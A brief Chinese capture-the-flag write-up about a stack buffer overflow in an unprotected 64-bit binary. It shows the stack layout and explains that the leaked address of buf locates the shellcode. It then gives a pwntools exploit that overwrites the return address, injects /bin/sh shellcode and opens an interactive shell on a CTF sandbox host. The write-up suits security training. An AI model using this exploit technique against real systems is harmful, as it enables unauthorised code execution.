64位的程序,没有发现任何保护
    image.png

    这边看一下栈和buf的位置

    1. -0000000000000010 buf             dq ?
    2. -0000000000000008 var_8           dq ?
    3. +0000000000000000  s              db 8 dup(?)
    4. +0000000000000008  r              db 8 dup(?)
    5. +0000000000000010
    6. +0000000000000010 ; end of stack variables

    image.png
    因为会把buf在栈上的地址给我们,我们就可以知道shellcode的位置了,返回位置覆盖一下就能获取权限了

    1. from pwn import *
    2. import re
    4. context(os='linux', arch="amd64", log_level="debug")
    5. content = 0
    6. pop_rdi = 0x04006f3
    8. elf = ELF("pwn")
    10. def main():
    11.     if content == 1:
    12.         peiqi = process("pwn")
    13.     else:
    14.         peiqi = remote("challenge-38597340852d3215.sandbox.ctfhub.com",21764)
    16.     addr = peiqi.recvuntil("]")
    17.     addr = int(addr[-15:-1],16)
    18.     addr = addr + 24 + 8
    20.     shellcode = asm(shellcraft.sh())
    21.     payload = b'a' * 24 + p64(addr) + shellcode
    22.     peiqi.recv()
    23.     peiqi.sendline(payload)
    25.     peiqi.interactive()
    27. main()

    image.png